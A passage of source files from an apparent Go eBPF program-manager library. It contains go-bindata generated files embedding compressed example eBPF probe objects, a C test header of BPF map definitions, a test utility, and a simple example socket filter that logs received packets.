"\xf6\x00\xf4\x71\x63\x1d\x77\x50\xea\xe9\x9b\x89\xfc\x8f\xdf\x05\x70\xcb\xab\xe3\x34\xdd\xf6\xee\x6b\xfe\x62\x5e" +
"\xc8\xd7\x05\xf8\xe8\x64\xcc\xb5\x13\xbe\x94\x59\x3e\x4b\x13\x84\xf3\xd9\x54\x26\xb9\xc4\x8b\xb3\x2c\x9d\xc8\x30" +
"\x93\x22\x9a\xcf\x12\x17\xdf\x5b\xc7\x3c\x93\x73\x2e\x4f\xc3\xa7\x99\x88\x25\x62\x31\x4b\xf8\x14\x3c\x2f\xb2\x42" +
"\x4c\xc0\xf3\x37\xb1\xd9\x47\x27\x63\xf0\x2c\x8d\x44\x21\xf4\xd9\x01\x3f\x78\x70\x8d\x29\x35\xdb\x13\x33\xaf\xab" +
"\xd6\xb3\xef\xf7\x9c\xe0\xf4\xad\x33\xbb\x36\x08\x3e\xac\xe9\xd7\x21\xf1\x61\x03\x9f\xbe\x85\x2e\x89\xe7\x96\x7f" +
"\x48\xf0\x95\xdd\xf7\x09\xde\x23\xf7\x08\xac\x4f\x67\xf0\xa7\x46\x2f\xbd\x7f\xbf\x86\xef\x12\x29\x9f\xc6\xcf\x2a" +
"\x6a\x9a\x3c\x0b\xee\x35\xf4\xdf\xac\xe1\xdf\xb1\xe0\xa0\x81\x3f\xf6\xdf\xb2\x67\x43\x9b\x78\x9f\xe0\x74\xfe\x23" +
"\x00\x37\x2b\xfa\xbb\x82\x6e\xde\xdb\x36\xcf\xf1\x1d\x1e\x56\xf4\xd6\x76\x66\xfb\x5f\x78\xba\xdb\x1e\xdf\x7d\x2f" +
"\xfe\x05\x00\x00\xff\xff\x0f\x7a\x6f\x8a\x90\x05\x00\x00")
func bindataProbeoBytes() ([]byte, error) {
return bindataRead(
_bindataProbeo,
"/probe.o",
)
}
func bindataProbeo() (*asset, error) {
bytes, err := bindataProbeoBytes()
if err != nil {
return nil, err
}
info := bindataFileInfo{
name: "/probe.o",
size: 1424,
md5checksum: "",
mode: os.FileMode(420),
modTime: time.Unix(1594295165, 0),
}
a := &asset{bytes: bytes, info: info}
return a, nil
}
//
// Asset loads and returns the asset for the given name.
// It returns an error if the asset could not be found or
// could not be loaded.
//
func Asset(name string) ([]byte, error) {
cannonicalName := strings.Replace(name, "\\", "/", -1)
if f, ok := _bindata[cannonicalName]; ok {
a, err := f()
if err != nil {
return nil, fmt.Errorf("Asset %s can't read by error: %v", name, err)
}
return a.bytes, nil
}
return nil, &os.PathError{Op: "open", Path: name, Err: os.ErrNotExist}
}
//
// MustAsset is like Asset but panics when Asset would return an error.
// It simplifies safe initialization of global variables.
// nolint: deadcode
//
func MustAsset(name string) []byte {
a, err := Asset(name)
if err != nil {
panic("asset: Asset(" + name + "): " + err.Error())
}
return a
}
//
// AssetInfo loads and returns the asset info for the given name.
// It returns an error if the asset could not be found or could not be loaded.
//
func AssetInfo(name string) (os.FileInfo, error) {
cannonicalName := strings.Replace(name, "\\", "/", -1)
if f, ok := _bindata[cannonicalName]; ok {
a, err := f()
if err != nil {
return nil, fmt.Errorf("AssetInfo %s can't read by error: %v", name, err)
}
return a.info, nil
}
return nil, &os.PathError{Op: "open", Path: name, Err: os.ErrNotExist}
}
//
// AssetNames returns the names of the assets.
// nolint: deadcode
//
func AssetNames() []string {
names := make([]string, 0, len(_bindata))
for name := range _bindata {
names = append(names, name)
}
return names
}
//
// _bindata is a table, holding each asset generator, mapped to its name.
//
var _bindata = map[string]func() (*asset, error){
"/probe.o": bindataProbeo,
}
//
// AssetDir returns the file names below a certain
// directory embedded in the file by go-bindata.
// For example if you run go-bindata on data/... and data contains the
// following hierarchy:
// data/
// foo.txt
// img/
// a.png
// b.png
// then AssetDir("data") would return []string{"foo.txt", "img"}
// AssetDir("data/img") would return []string{"a.png", "b.png"}
// AssetDir("foo.txt") and AssetDir("notexist") would return an error
// AssetDir("") will return []string{"data"}.
//
func AssetDir(name string) ([]string, error) {
node := _bintree
if len(name) != 0 {
cannonicalName := strings.Replace(name, "\\", "/", -1)
pathList := strings.Split(cannonicalName, "/")
for _, p := range pathList {
node = node.Children[p]
if node == nil {
return nil, &os.PathError{
Op: "open",
Path: name,
Err: os.ErrNotExist,
}
}
}
}
if node.Func != nil {
return nil, &os.PathError{
Op: "open",
Path: name,
Err: os.ErrNotExist,
}
}
rv := make([]string, 0, len(node.Children))
for childName := range node.Children {
rv = append(rv, childName)
}
return rv, nil
}
type bintree struct {
Func func() (*asset, error)
Children map[string]*bintree
}
var _bintree = &bintree{Func: nil, Children: map[string]*bintree{
"": {Func: nil, Children: map[string]*bintree{
"probe.o": {Func: bindataProbeo, Children: map[string]*bintree{}},
}},
}}
// RestoreAsset restores an asset under the given directory
func RestoreAsset(dir, name string) error {
data, err := Asset(name)
if err != nil {
return err
}
info, err := AssetInfo(name)
if err != nil {
return err
}
err = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))
if err != nil {
return err
}
err = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())
if err != nil {
return err
}
return os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())
}
// RestoreAssets restores an asset under the given directory recursively
func RestoreAssets(dir, name string) error {
children, err := AssetDir(name)
// File
if err != nil {
return RestoreAsset(dir, name)
}
// Dir
for _, child := range children {
err = RestoreAssets(dir, filepath.Join(name, child))
if err != nil {
return err
}
}
return nil
}
func _filePath(dir, name string) string {
cannonicalName := strings.Replace(name, "\\", "/", -1)
return filepath.Join(append([]string{dir}, strings.Split(cannonicalName, "/")...)...)
}
<|start_filename|>utsname_int8.go<|end_filename|>
// +build linux,amd64 linux,arm64 linux,386
package ebpf
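// utsnameStr converts a NUL-terminated int8 slice, such as the fields of a
// utsname struct on these architectures, into a Go string.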
func utsnameStr(in []int8) string {
	out := make([]byte, 0, len(in))
for i := 0; i < len(in); i++ {
if in[i] == 0 {
break
}
out = append(out, byte(in[i]))
}
return string(out)
}
<|start_filename|>manager/testdata/common.h<|end_filename|>
#pragma once
typedef unsigned int uint32_t;
typedef unsigned long uint64_t;
#define __section(NAME) __attribute__((section(NAME), used))
#define BPF_MAP_TYPE_ARRAY (1)
#define BPF_MAP_TYPE_PERF_EVENT_ARRAY (4)
#define BPF_MAP_TYPE_ARRAY_OF_MAPS (12)
#define BPF_MAP_TYPE_HASH_OF_MAPS (13)
#define BPF_F_NO_PREALLOC (1U << 0)
#define BPF_F_CURRENT_CPU (0xffffffffULL)
struct map {
uint32_t type;
uint32_t key_size;
uint32_t value_size;
uint32_t max_entries;
uint32_t flags;
uint32_t inner_map_idx;
uint32_t dummy;
};
static void* (*map_lookup_elem)(const void *map, const void *key) = (void*)1;
static int (*perf_event_output)(const void *ctx, const void *map, uint64_t index, const void *data, uint64_t size) = (void*)25;
static uint32_t (*get_smp_processor_id)(void) = (void*)8;
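/*
 * Illustrative sketch of how the declarations above are typically used in a
 * test program; the map and section names below are placeholders.
 *
 *   struct map counters __section("maps/counters") = {
 *       .type        = BPF_MAP_TYPE_ARRAY,
 *       .key_size    = sizeof(uint32_t),
 *       .value_size  = sizeof(uint64_t),
 *       .max_entries = 1,
 *   };
 *
 *   __section("socket/filter") int count_packets(void *ctx)
 *   {
 *       uint32_t key = 0;
 *       uint64_t *value = map_lookup_elem(&counters, &key);
 *       if (value)
 *           *value += 1;
 *       return 0;
 *   }
 */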
<|start_filename|>manager/examples/tests_and_benchmarks/utils.go<|end_filename|>
package main
import (
"bytes"
"github.com/pkg/errors"
"github.com/sirupsen/logrus"
"io"
)
// recoverAssets - Recover ebpf asset
func recoverAssets() io.ReaderAt {
buf, err := Asset("/probe.o")
if err != nil {
logrus.Fatal(errors.Wrap(err, "couldn't find asset"))
}
return bytes.NewReader(buf)
}
<|start_filename|>manager/examples/programs/socket/probe.go<|end_filename|>
// Code generated by go-bindata. DO NOT EDIT.
// sources:
// ebpf/bin/probe.o
package main
import (
"bytes"
"compress/gzip"
"fmt"
"io"
"io/ioutil"
"os"
"path/filepath"
"strings"
"time"
)
func bindataRead(data []byte, name string) ([]byte, error) {
gz, err := gzip.NewReader(bytes.NewBuffer(data))
if err != nil {
return nil, fmt.Errorf("Read %q: %v", name, err)
}
var buf bytes.Buffer
_, err = io.Copy(&buf, gz)
clErr := gz.Close()
if err != nil {
return nil, fmt.Errorf("Read %q: %v", name, err)
}
if clErr != nil {
return nil, err
}
return buf.Bytes(), nil
}
type asset struct {
bytes []byte
info fileInfoEx
}
type fileInfoEx interface {
os.FileInfo
MD5Checksum() string
}
type bindataFileInfo struct {
name string
size int64
mode os.FileMode
modTime time.Time
md5checksum string
}
func (fi bindataFileInfo) Name() string {
return fi.name
}
func (fi bindataFileInfo) Size() int64 {
return fi.size
}
func (fi bindataFileInfo) Mode() os.FileMode {
return fi.mode
}
func (fi bindataFileInfo) ModTime() time.Time {
return fi.modTime
}
func (fi bindataFileInfo) MD5Checksum() string {
return fi.md5checksum
}
func (fi bindataFileInfo) IsDir() bool {
return false
}
func (fi bindataFileInfo) Sys() interface{} {
return nil
}
var _bindataProbeo = []byte(
"\x1f\x8b\x08\x00\x00\x00\x00\x00\x00\xff\x8c\x54\xcf\x6b\x13\x41\x14\xfe\x26\x89\x69\xb4\x3d\x54\xa1\x50\x83\x87" +
"\x80\xf7\xd1\x7a\xa8\x47\x43\xc1\xe8\x21\x87\x22\xc5\x9b\x2c\xeb\x76\x8a\x8b\xf9\x21\xbb\x4b\xad\x56\x50\x04\xef" +
"\x5e\x3c\x8b\x7f\x45\x8e\xfa\x4f\x78\xf3\x90\xa3\xe0\xa5\x82\x20\x5e\x1c\x79\xe3\x9b\xee\xf0\xb2\x4b\xf2\xc1\xe4" +
"\xbd\xf7\xcd\x7c\xf3\x7e\x64\xd8\xd7\x77\x87\x83\x86\x52\xf0\x50\xf8\x8d\x32\x2a\x71\xd2\x28\xfd\x3e\xff\x6e\x40" +
"\x61\xa6\x80\x63\x73\x78\x29\xe9\x9e\x59\x62\xb7\x15\x60\x8a\x5e\x46\xbe\x49\x4c\x7a\xda\xfd\x7e\xce\x4f\xcc\xf3" +
"\x1e\xf9\xcf\xe2\xe4\xe9\x69\x77\xee\xf8\x19\x27\xcb\xbb\xbf\x5c\xfc\xf9\xd3\xff\x78\x4d\x01\x73\x6b\xed\xac\x01" +
"\x6c\x01\x78\x07\xa0\x4d\xe7\xb9\x86\x0f\x6c\xe9\x4e\xba\x8f\x72\x52\x3e\xaa\x05\xf7\xf6\x87\xb4\xf7\xd7\x5a\xfb" +
"\xf1\x87\xc2\xb6\xe8\xc5\xa5\x0c\x37\x5a\xc1\xea\x00\xd8\x2c\xcf\x7a\x57\xbd\x7c\x80\xce\xab\x75\xb5\x41\xbd\xf0" +
"\xf2\x78\x53\x31\x2f\x89\x87\xee\xfa\x9f\xb6\x6a\xaf\x89\xe6\x02\x77\x07\xc0\x65\x5c\x38\x8f\x5b\x6c\x77\x1d\xdf" +
"\x5e\xe0\xa9\xce\x2b\xc1\x3d\xbe\xa6\x6b\x41\xcf\xee\x2f\xd4\x85\x39\x29\xa0\xf7\x0e\x06\x9a\x9c\x7c\x4a\xb3\x8b" +
"\xc8\x44\x47\xe9\xa8\x30\x19\x53\x37\x42\x2a\x3a\x36\x59\x9e\x4e\x27\x88\x46\x69\x62\x26\xb9\x81\xce\xcc\x48\x9b" +
"\x27\xd1\x51\x16\x8f\x0d\xc6\x71\x3a\xd1\x09\x74\x5e\x64\x45\xfc\x18\x3a\x7f\x31\x76\x76\xef\x60\x00\x9d\x4d\x0f" +
"\xe3\x22\xa6\xbd\x1d\xbd\xb3\xbb\xc2\xac\x56\xc1\x23\x37\xb7\x45\x9c\xf1\x7b\x7a\x2b\x78\xf9\xa6\x15\xaf\xb6\xe0" +
"\xfb\x35\xf9\x5a\x22\xbe\xbe\x44\x2f\xdf\x44\x47\xc4\x19\xeb\x6f\x09\xfe\x0b\xdb\x2d\xc1\x6f\x8a\x3e\xfa\xec\xcb" +
"\x19\x7c\xad\xa9\x57\xf6\x7f\xbb\x46\xff\xad\x46\x2f\xe3\x71\xc5\x9d\x84\x39\xdb\xab\x4b\xf2\xaf\xd5\xe8\xff\xb0" +
"\xed\x2d\xd1\x0f\xc3\x37\x1d\xa0\xc7\x07\x6f\x0a\x5e\xce\xff\x3e\x80\x8b\x55\xf5\xb3\xde\xcf\x7b\x9d\xcf\x79\xbd" +
"\xe7\x4d\x45\x6e\xc2\x3e\xeb\xdf\x07\x75\x37\x03\xbd\xff\x6e\xfc\x0b\x00\x00\xff\xff\x23\x8c\xef\x81\x78\x05\x00" +
"\x00")
func bindataProbeoBytes() ([]byte, error) {
return bindataRead(
_bindataProbeo,
"/probe.o",
)
}
func bindataProbeo() (*asset, error) {
bytes, err := bindataProbeoBytes()
if err != nil {
return nil, err
}
info := bindataFileInfo{
name: "/probe.o",
size: 1400,
md5checksum: "",
mode: os.FileMode(420),
modTime: time.Unix(1594295120, 0),
}
a := &asset{bytes: bytes, info: info}
return a, nil
}
//
// Asset loads and returns the asset for the given name.
// It returns an error if the asset could not be found or
// could not be loaded.
//
func Asset(name string) ([]byte, error) {
cannonicalName := strings.Replace(name, "\\", "/", -1)
if f, ok := _bindata[cannonicalName]; ok {
a, err := f()
if err != nil {
return nil, fmt.Errorf("Asset %s can't read by error: %v", name, err)
}
return a.bytes, nil
}
return nil, &os.PathError{Op: "open", Path: name, Err: os.ErrNotExist}
}
//
// MustAsset is like Asset but panics when Asset would return an error.
// It simplifies safe initialization of global variables.
// nolint: deadcode
//
func MustAsset(name string) []byte {
a, err := Asset(name)
if err != nil {
panic("asset: Asset(" + name + "): " + err.Error())
}
return a
}
//
// AssetInfo loads and returns the asset info for the given name.
// It returns an error if the asset could not be found or could not be loaded.
//
func AssetInfo(name string) (os.FileInfo, error) {
cannonicalName := strings.Replace(name, "\\", "/", -1)
if f, ok := _bindata[cannonicalName]; ok {
a, err := f()
if err != nil {
return nil, fmt.Errorf("AssetInfo %s can't read by error: %v", name, err)
}
return a.info, nil
}
return nil, &os.PathError{Op: "open", Path: name, Err: os.ErrNotExist}
}
//
// AssetNames returns the names of the assets.
// nolint: deadcode
//
func AssetNames() []string {
names := make([]string, 0, len(_bindata))
for name := range _bindata {
names = append(names, name)
}
return names
}
//
// _bindata is a table, holding each asset generator, mapped to its name.
//
var _bindata = map[string]func() (*asset, error){
"/probe.o": bindataProbeo,
}
//
// AssetDir returns the file names below a certain
// directory embedded in the file by go-bindata.
// For example if you run go-bindata on data/... and data contains the
// following hierarchy:
// data/
// foo.txt
// img/
// a.png
// b.png
// then AssetDir("data") would return []string{"foo.txt", "img"}
// AssetDir("data/img") would return []string{"a.png", "b.png"}
// AssetDir("foo.txt") and AssetDir("notexist") would return an error
// AssetDir("") will return []string{"data"}.
//
func AssetDir(name string) ([]string, error) {
node := _bintree
if len(name) != 0 {
cannonicalName := strings.Replace(name, "\\", "/", -1)
pathList := strings.Split(cannonicalName, "/")
for _, p := range pathList {
node = node.Children[p]
if node == nil {
return nil, &os.PathError{
Op: "open",
Path: name,
Err: os.ErrNotExist,
}
}
}
}
if node.Func != nil {
return nil, &os.PathError{
Op: "open",
Path: name,
Err: os.ErrNotExist,
}
}
rv := make([]string, 0, len(node.Children))
for childName := range node.Children {
rv = append(rv, childName)
}
return rv, nil
}
type bintree struct {
Func func() (*asset, error)
Children map[string]*bintree
}
var _bintree = &bintree{Func: nil, Children: map[string]*bintree{
"": {Func: nil, Children: map[string]*bintree{
"probe.o": {Func: bindataProbeo, Children: map[string]*bintree{}},
}},
}}
// RestoreAsset restores an asset under the given directory
func RestoreAsset(dir, name string) error {
data, err := Asset(name)
if err != nil {
return err
}
info, err := AssetInfo(name)
if err != nil {
return err
}
err = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))
if err != nil {
return err
}
err = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())
if err != nil {
return err
}
return os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())
}
// RestoreAssets restores an asset under the given directory recursively
func RestoreAssets(dir, name string) error {
children, err := AssetDir(name)
// File
if err != nil {
return RestoreAsset(dir, name)
}
// Dir
for _, child := range children {
err = RestoreAssets(dir, filepath.Join(name, child))
if err != nil {
return err
}
}
return nil
}
func _filePath(dir, name string) string {
cannonicalName := strings.Replace(name, "\\", "/", -1)
return filepath.Join(append([]string{dir}, strings.Split(cannonicalName, "/")...)...)
}
<|start_filename|>manager/examples/clone_vs_add_hook/probe.go<|end_filename|>
// Code generated by go-bindata. DO NOT EDIT.
// sources:
// ebpf/bin/probe.o
package main
import (
"bytes"
"compress/gzip"
"fmt"
"io"
"io/ioutil"
"os"
"path/filepath"
"strings"
"time"
)
func bindataRead(data []byte, name string) ([]byte, error) {
gz, err := gzip.NewReader(bytes.NewBuffer(data))
if err != nil {
return nil, fmt.Errorf("Read %q: %v", name, err)
}
var buf bytes.Buffer
_, err = io.Copy(&buf, gz)
clErr := gz.Close()
if err != nil {
return nil, fmt.Errorf("Read %q: %v", name, err)
}
if clErr != nil {
return nil, err
}
return buf.Bytes(), nil
}
type asset struct {
bytes []byte
info fileInfoEx
}
type fileInfoEx interface {
os.FileInfo
MD5Checksum() string
}
type bindataFileInfo struct {
name string
size int64
mode os.FileMode
modTime time.Time
md5checksum string
}
func (fi bindataFileInfo) Name() string {
return fi.name
}
func (fi bindataFileInfo) Size() int64 {
return fi.size
}
func (fi bindataFileInfo) Mode() os.FileMode {
return fi.mode
}
func (fi bindataFileInfo) ModTime() time.Time {
return fi.modTime
}
func (fi bindataFileInfo) MD5Checksum() string {
return fi.md5checksum
}
func (fi bindataFileInfo) IsDir() bool {
return false
}
func (fi bindataFileInfo) Sys() interface{} {
return nil
}
var _bindataProbeo = []byte(
"\x1f\x8b\x08\x00\x00\x00\x00\x00\x00\xff\xec\x56\x3f\x68\xd4\x50\x18\xff\xd2\xeb\xf5\xce\x56\xe4\xaa\x20\xd7\x70" +
"\x43\x44\x84\x16\x21\xb5\xa2\x22\x82\x58\x2a\xd6\xa5\x83\x48\x87\x6e\x47\x7a\x4d\x6d\xc8\xe5\x0f\x49\xac\xb6\x29" +
"\x28\x88\x83\x9b\x8b\x83\x2e\xe2\x9f\xcd\x41\xb7\xe2\x74\x37\x76\xec\x22\x38\xba\x08\x45\x17\x75\xb1\x93\x91\xef" +
"\xe5\x25\xf9\xfa\x2e\xb1\xd7\x4d\xc1\x0f\xae\x79\xdf\xef\xbd\xef\x7d\xdf\xf7\x7b\xbf\xbc\xf4\xde\xb5\xb9\xd9\x01" +
"\x49\x82\xc4\x24\xf8\x09\x99\x97\xd9\x74\x95\x8c\xf9\xdf\x51\x90\xa0\x73\x3c\xc6\xea\xa5\xbd\xeb\xc3\x4b\xbb\x11" +
"\x3e\x37\x25\x80\xa5\x61\x00\x53\xde\x61\x7e\x5d\x02\x08\x34\x3b\xc0\xb1\x72\x59\x39\x15\xca\x9f\x52\x5c\xb1\xd6" +
"\x9a\x38\x6e\x39\xb6\x1f\xca\x1f\x53\xdc\x75\x0c\x1b\xc7\xc1\x84\xb2\x11\xca\xdb\x29\xbe\xec\x2b\x2b\x38\x76\x1c" +
"\x53\x09\xe5\xad\x14\xb7\xcc\x25\x03\xc7\x9e\x32\xbe\x1a\xca\xdd\xb4\x0e\x34\x5f\xfe\xc2\xfc\xce\x8b\xd8\xaf\x48" +
"\x00\xdd\x28\x8a\x36\x07\x00\x4e\x03\xc0\x43\x00\x18\xe2\x4f\x6c\xf9\x16\xd6\x09\x00\x77\xf8\xb3\xf3\x9a\xc7\x0d" +
"\x02\xec\x46\x51\xd4\xd1\x78\xff\x03\x7b\xfb\xef\x70\x3e\x36\xcb\xf1\x3e\xb8\xdf\x18\xfa\x7c\xfe\x49\xb2\xee\x2f" +
"\xe4\xcf\xb3\xfe\x1d\xfe\xb0\xae\x09\xc6\xcf\xb7\xb4\x7e\xc7\x54\x5c\xd6\x97\x61\x07\x21\xe1\xcd\x6f\x69\x6d\x1c" +
"\xb7\x95\x15\x87\xf2\x16\xdc\xf6\x18\x3f\xca\xb8\xbf\x46\x79\xcb\x74\xe4\xe9\x09\x6f\x19\x0f\x3f\x7a\x78\xd8\xe6" +
"\x3c\x9c\x24\x3c\x88\xf5\x0e\xc2\x7f\xfb\x93\x21\xe7\xa8\x3b\xd4\x26\xea\x12\xb5\x8b\xba\x45\x6d\xa3\xae\x51\xfb" +
"\xa8\x7b\x7c\x27\xd0\x50\xab\x07\x59\x1f\xef\xef\xe9\x78\xe6\x78\xde\xa8\x89\x36\x0d\x1d\x86\xeb\x37\xe6\x00\x7e" +
"\x45\x51\xf4\xfc\xab\x04\x75\xa1\x3e\x76\xfc\x74\x62\x90\xfc\x50\xa8\xb5\x18\xae\x25\xeb\xd7\x6f\x42\x75\x63\x44" +
"\x3a\x8c\x9a\xe2\xbf\xc4\xa6\xc9\x45\xdb\x00\x80\x73\x05\x73\xc9\xfc\x3c\xf1\xdf\xf5\xc9\xe7\x7b\x56\xda\xf7\x28" +
"\x6f\xae\x04\xa5\xdc\x98\x12\x94\x0b\xf0\x4a\x0f\xf6\x12\x00\x46\x61\x38\xf5\x13\x7d\x3f\x65\xf8\x48\x0f\x8e\x3d" +
"\x1c\x25\x79\x93\x3e\x55\x86\x97\x7b\xf0\x75\x86\x67\x79\x93\xbe\x6b\x84\x63\x6a\x27\x58\xde\xec\x63\xd5\xe0\xfb" +
"\x24\x08\xba\x58\x6d\x55\xca\xfc\x91\x3e\xe6\x1b\x64\x1e\xaf\xaa\x8b\xc4\xc7\x6e\x16\x88\xcf\x7a\x55\x03\xfd\x6e" +
"\x00\xea\xcc\xfc\xac\x8a\x03\x22\x47\xb0\x34\xd7\x9f\x24\x80\x0f\xa6\xeb\x39\x8b\x7a\x73\x75\xd9\x6f\x32\x41\x83" +
"\xea\xe9\xed\x18\x9c\xcc\x40\xb2\x8a\xc9\x58\x5c\x15\x83\xa6\xa7\x07\x2e\xae\x23\x2e\x5b\x12\xfb\xcd\x55\xdd\xf3" +
"\x0d\xc7\x86\x66\xdb\x68\xe9\xb6\xaf\xb3\x5d\x54\x7d\xa5\xb9\xec\x69\x96\x0e\x96\x66\xd8\x6a\x0b\x54\x3f\xf0\x02" +
"\x6d\x11\x54\x7f\xcd\x62\xcf\x99\xf9\x59\x50\x3d\x67\x49\x0b\x34\x9c\x9b\x52\xa7\x2e\xe4\xd0\x7f\x60\xeb\x72\xfe" +
"\x44\x5b\xe0\x47\xfe\x59\xc0\xc5\xff\x4d\x24\xfe\x1b\x12\xf0\xe9\x82\x7c\xe2\xfd\x6b\xec\x13\x2f\xbe\x87\x55\x61" +
"\x9d\x0e\x00\x87\x72\xf2\xec\xf0\x0d\x15\xee\xd7\x78\x9f\x55\xe2\xa3\x5d\x2d\xc8\x7f\x5f\xea\x2f\xff\x95\x82\xfc" +
"\xd5\x4a\x6f\xfe\x72\x4e\xfe\x47\x05\xf9\xbb\xfc\x7b\x2c\xde\x33\x62\xfe\x06\x79\x07\xa8\xb9\x1c\x68\x08\xf5\x8b" +
"\xfc\x7f\xe0\xf1\x67\x05\xfc\x31\x5f\xf8\x40\xc0\xd3\x7b\x95\x3f\x5f\x15\xe4\x3f\x56\xce\xcf\x27\xea\xe7\x59\x41" +
"\x7c\xbd\x20\x5e\xf4\xb7\x73\xf6\x44\x6b\xf0\xf8\xb1\x7d\xf2\x57\x0a\xe2\xcf\xf3\x78\x65\x9f\xf8\xb7\xe4\x4e\xa2" +
"\xb6\xc0\xe3\x5d\x01\x17\xcf\xef\x4d\x81\x7e\xc6\xb9\x7e\xce\x70\x1f\x79\x3f\x92\xa3\x9f\xad\x9c\xdc\x0c\x4f\xea" +
"\x27\xf7\x28\xd5\x5f\xf2\x1d\xfc\x1d\x00\x00\xff\xff\x58\x41\x60\x89\x80\x0c\x00\x00")
func bindataProbeoBytes() ([]byte, error) {
return bindataRead(
_bindataProbeo,
"/probe.o",
)
}
func bindataProbeo() (*asset, error) {
bytes, err := bindataProbeoBytes()
if err != nil {
return nil, err
}
info := bindataFileInfo{
name: "/probe.o",
size: 3200,
md5checksum: "",
mode: os.FileMode(436),
modTime: time.Unix(1594301585, 0),
}
a := &asset{bytes: bytes, info: info}
return a, nil
}
//
// Asset loads and returns the asset for the given name.
// It returns an error if the asset could not be found or
// could not be loaded.
//
func Asset(name string) ([]byte, error) {
cannonicalName := strings.Replace(name, "\\", "/", -1)
if f, ok := _bindata[cannonicalName]; ok {
a, err := f()
if err != nil {
return nil, fmt.Errorf("Asset %s can't read by error: %v", name, err)
}
return a.bytes, nil
}
return nil, &os.PathError{Op: "open", Path: name, Err: os.ErrNotExist}
}
//
// MustAsset is like Asset but panics when Asset would return an error.
// It simplifies safe initialization of global variables.
// nolint: deadcode
//
func MustAsset(name string) []byte {
a, err := Asset(name)
if err != nil {
panic("asset: Asset(" + name + "): " + err.Error())
}
return a
}
//
// AssetInfo loads and returns the asset info for the given name.
// It returns an error if the asset could not be found or could not be loaded.
//
func AssetInfo(name string) (os.FileInfo, error) {
cannonicalName := strings.Replace(name, "\\", "/", -1)
if f, ok := _bindata[cannonicalName]; ok {
a, err := f()
if err != nil {
return nil, fmt.Errorf("AssetInfo %s can't read by error: %v", name, err)
}
return a.info, nil
}
return nil, &os.PathError{Op: "open", Path: name, Err: os.ErrNotExist}
}
//
// AssetNames returns the names of the assets.
// nolint: deadcode
//
func AssetNames() []string {
names := make([]string, 0, len(_bindata))
for name := range _bindata {
names = append(names, name)
}
return names
}
//
// _bindata is a table, holding each asset generator, mapped to its name.
//
var _bindata = map[string]func() (*asset, error){
"/probe.o": bindataProbeo,
}
//
// AssetDir returns the file names below a certain
// directory embedded in the file by go-bindata.
// For example if you run go-bindata on data/... and data contains the
// following hierarchy:
// data/
// foo.txt
// img/
// a.png
// b.png
// then AssetDir("data") would return []string{"foo.txt", "img"}
// AssetDir("data/img") would return []string{"a.png", "b.png"}
// AssetDir("foo.txt") and AssetDir("notexist") would return an error
// AssetDir("") will return []string{"data"}.
//
func AssetDir(name string) ([]string, error) {
node := _bintree
if len(name) != 0 {
cannonicalName := strings.Replace(name, "\\", "/", -1)
pathList := strings.Split(cannonicalName, "/")
for _, p := range pathList {
node = node.Children[p]
if node == nil {
return nil, &os.PathError{
Op: "open",
Path: name,
Err: os.ErrNotExist,
}
}
}
}
if node.Func != nil {
return nil, &os.PathError{
Op: "open",
Path: name,
Err: os.ErrNotExist,
}
}
rv := make([]string, 0, len(node.Children))
for childName := range node.Children {
rv = append(rv, childName)
}
return rv, nil
}
type bintree struct {
Func func() (*asset, error)
Children map[string]*bintree
}
var _bintree = &bintree{Func: nil, Children: map[string]*bintree{
"": {Func: nil, Children: map[string]*bintree{
"probe.o": {Func: bindataProbeo, Children: map[string]*bintree{}},
}},
}}
// RestoreAsset restores an asset under the given directory
func RestoreAsset(dir, name string) error {
data, err := Asset(name)
if err != nil {
return err
}
info, err := AssetInfo(name)
if err != nil {
return err
}
err = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))
if err != nil {
return err
}
err = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())
if err != nil {
return err
}
return os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())
}
// RestoreAssets restores an asset under the given directory recursively
func RestoreAssets(dir, name string) error {
children, err := AssetDir(name)
// File
if err != nil {
return RestoreAsset(dir, name)
}
// Dir
for _, child := range children {
err = RestoreAssets(dir, filepath.Join(name, child))
if err != nil {
return err
}
}
return nil
}
func _filePath(dir, name string) string {
cannonicalName := strings.Replace(name, "\\", "/", -1)
return filepath.Join(append([]string{dir}, strings.Split(cannonicalName, "/")...)...)
}
<|start_filename|>manager/examples/programs/socket/ebpf/main.c<|end_filename|>
#include "include/bpf.h"
#include "include/bpf_helpers.h"
SEC("socket/sock_filter")
int socket_sock_filter(void *ctx)
{
bpf_printk("new packet received\n");
return 0;
};
char _license[] SEC("license") = "GPL";
__u32 _version SEC("version") = 0xFFFFFFFE;
<|start_filename|>manager/examples/programs/tracepoint/probe.go<|end_filename|>
// Code generated by go-bindata. DO NOT EDIT.
// sources:
// ebpf/bin/probe.o
package main
import (
"bytes"
"compress/gzip"
"fmt"
"io"
"io/ioutil"
"os"
"path/filepath"
"strings"
"time"
)
func bindataRead(data []byte, name string) ([]byte, error) {
gz, err := gzip.NewReader(bytes.NewBuffer(data))
if err != nil {
return nil, fmt.Errorf("Read %q: %v", name, err)
}
var buf bytes.Buffer
_, err = io.Copy(&buf, gz)
clErr := gz.Close()
if err != nil {
return nil, fmt.Errorf("Read %q: %v", name, err)
}
if clErr != nil {
return nil, err
}
return buf.Bytes(), nil
}
type asset struct {
bytes []byte
info fileInfoEx
}
type fileInfoEx interface {
os.FileInfo
MD5Checksum() string
}
type bindataFileInfo struct {
name string
size int64
mode os.FileMode
modTime time.Time
md5checksum string
}
func (fi bindataFileInfo) Name() string {
return fi.name
}
func (fi bindataFileInfo) Size() int64 {
return fi.size
}
func (fi bindataFileInfo) Mode() os.FileMode {
return fi.mode
}
func (fi bindataFileInfo) ModTime() time.Time {
return fi.modTime
}
func (fi bindataFileInfo) MD5Checksum() string {
return fi.md5checksum
}
func (fi bindataFileInfo) IsDir() bool {
return false
}
func (fi bindataFileInfo) Sys() interface{} {
return nil
}
var _bindataProbeo = []byte(
"\x1f\x8b\x08\x00\x00\x00\x00\x00\x00\xff\x8c\x54\x31\x8b\x13\x41\x14\xfe\x26\x89\xb9\xe8\x9d\x10\xad\xce\x90\x22" +
